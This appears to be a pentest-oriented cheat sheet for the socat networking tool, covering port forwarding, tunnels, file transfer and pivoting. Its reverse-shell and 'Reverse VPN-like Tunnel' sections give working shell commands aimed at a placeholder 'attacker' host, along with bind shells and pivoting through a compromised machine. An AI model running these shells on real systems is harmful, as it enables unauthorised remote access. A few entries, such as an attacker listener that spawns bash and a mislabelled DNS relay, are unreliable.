Socat
Socat is a command-line based utility for establishing two bidirectional independent data channels and relaying data between them. Used for port forwarding, tunneling, and network manipulation.
Installation
# Debian/Ubuntu
sudo apt install socat
# Kali Linux (pre-installed)
which socat
# macOS
brew install socat
# Build from source
wget http://www.dest-unreach.org/socat/download/socat-1.7.3.3.tar.gz
tar xzf socat-1.7.3.3.tar.gz && cd socat-1.7.3.3
./configure && make && sudo make installBasic Usage
| Command | Description |
|---|---|
socat TCP-LISTEN:80 - | Listen on port 80, print output to console |
socat TCP:target:80 - | Connect to target:80, interact with stdin/stdout |
socat TCP-LISTEN:80 TCP:server:80 | Port forward: localhost:80 -> server:80 |
socat - TCP:target:23 | Connect to Telnet service |
Port Forwarding
# Forward local port 80 to remote server
socat TCP-LISTEN:80,reuseaddr,fork TCP:192.168.1.100:80
# Forward with specific bind interface
socat TCP-LISTEN:8080,reuseaddr,bind=0.0.0.0,fork TCP:target:80
# Bind to localhost only
socat TCP-LISTEN:8080,reuseaddr,bind=127.0.0.1,fork TCP:target:80
# Forward multiple connections (fork)
socat TCP-LISTEN:443,reuseaddr,fork TCP:192.168.1.50:443
# UDP port forward
socat UDP-LISTEN:53,reuseaddr,fork UDP:8.8.8.8:53Reverse Shells
Reverse TCP Shell (Attacker Listener)
# Listening side (attacker)
socat TCP-LISTEN:4444,reuseaddr -
# Victim connects back
socat exec:/bin/bash TCP:attacker:4444Reverse TCP Shell with Options
# Attacker listener with better control
socat TCP-LISTEN:4444,reuseaddr,fork EXEC:/bin/bash
# Victim side (explicit redirection)
socat TCP:attacker:4444 EXEC:/bin/bashInteractive Reverse Shell
# Bind shell (victim listening)
socat TCP-LISTEN:4444,reuseaddr,fork EXEC:/bin/bash
# Connect to it (attacker)
socat TCP:target:4444 -
# Or with pty for better control
socat TCP:target:4444 EXEC:'bash -li',pty,setsid,sigint,saneFile Transfer
# Send file (server)
socat TCP-LISTEN:4444 < file.txt
# Receive file (client)
socat TCP:server:4444 > file.txt
# Bidirectional file transfer
socat TCP-LISTEN:4444 FILE:file.txt
# Binary file transfer
socat TCP-LISTEN:4444,reuseaddr FILE:binary.exeEncrypted Tunneling
SSL/TLS Port Forward
# Generate SSL certificate (listener side)
openssl req -new -x509 -days 365 -nodes -out cert.pem -keyout key.pem
# Create SSL listener
socat OPENSSL-LISTEN:4444,cert=cert.pem,verify=0,reuseaddr,fork TCP:target:80
# Connect via SSL
socat - OPENSSL:server:4444,verify=0Command Execution
# Execute command and read output
socat TCP-LISTEN:4444 EXEC:"whoami"
# Execute command and provide input
socat TCP-LISTEN:4444 EXEC:/bin/bash
# Execute with pseudo-terminal
socat TCP-LISTEN:4444,reuseaddr EXEC:/bin/bash,pty,setsid,sigint
# Run command with elevated privileges
socat TCP-LISTEN:4444 EXEC:"/bin/bash",su=rootTunneling and Pivoting
SOCKS Tunneling
# Create SOCKS proxy
socat TCP-LISTEN:1080,reuseaddr,fork SOCKS4A:127.0.0.1,proxyport=8080Chain Multiple Connections
# Two-way relay
socat TCP-LISTEN:8080 TCP:final-target:80
# UDP to TCP relay
socat UDP-LISTEN:53,reuseaddr,fork TCP:8.8.8.8:53Interactive Connection
# Connect to TCP service
socat - TCP:target:22
# Connect to UDP service
socat - UDP:target:53
# Connect with telnet
socat - TCP:target:23
# Connect to HTTP
socat - TCP:target:80
# With readline support
socat readline TCP:target:23Advanced Options
# Fork on each connection
socat ... ,fork
# Reuse address (don't wait for TIME_WAIT)
socat ... ,reuseaddr
# Bind to specific interface
socat TCP-LISTEN:80,bind=192.168.1.100 ...
# Set keepalive
socat ... ,keepalive
# Set socket options
socat ... ,so-reuseaddr,so-keepalive
# Verbose output (debug)
socat -v TCP-LISTEN:80 TCP:target:80
# Very verbose
socat -vv TCP-LISTEN:80 TCP:target:80
# Hex output
socat -x TCP-LISTEN:80 TCP:target:80Practical Examples
Pivot Through Compromised Host
# On compromised machine
socat TCP-LISTEN:9999,reuseaddr,fork TCP:internal-network-host:80
# From attacker machine
socat - TCP:compromised-host:9999Expose Internal Service
# Make internal service available externally
socat TCP-LISTEN:80,reuseaddr,fork TCP:127.0.0.1:8080DNS Tunneling
# Relay DNS through firewall
socat UDP-LISTEN:53,reuseaddr,fork UDP:8.8.8.8:53Reverse VPN-like Tunnel
# Victim initiates connection, attacker gets shell
socat TCP:attacker:4444 EXEC:/bin/bash
# Attacker listener
socat TCP-LISTEN:4444 -Data Dumping and Analysis
# Capture and display traffic
socat -v TCP-LISTEN:80,reuseaddr,fork TCP:target:80
# Hex dump
socat -x TCP-LISTEN:80 TCP:target:80
# Save traffic to file
socat TCP-LISTEN:80 | tee traffic.txt | nc target 80Troubleshooting
# Check if port is already in use
netstat -tulpn | grep 4444
# Kill socat process
pkill -f socat
# Enable verbose debugging
socat -d -d TCP-LISTEN:4444 TCP:target:80
# Test connection
socat TCP-LISTEN:4444,reuseaddr,fork -
# Then: nc localhost 4444Common Options Summary
TCP-LISTEN:port # Listen on TCP port
TCP:host:port # Connect to TCP
UDP-LISTEN:port # Listen on UDP
UDP:host:port # Connect to UDP
EXEC:cmd # Execute command
FILE:path # File operations
OPENSSL:host:port # SSL connection
OPENSSL-LISTEN:port # SSL listener
- # Stdin/stdout
,fork # New process per connection
,reuseaddr # Reuse socket address
,bind=addr # Bind to interface
,pty # Pseudo-terminal
,su=user # Switch user
,verify=0 # Skip SSL verification
-v # Verbose output
-x # Hex outputLast updated: March 2026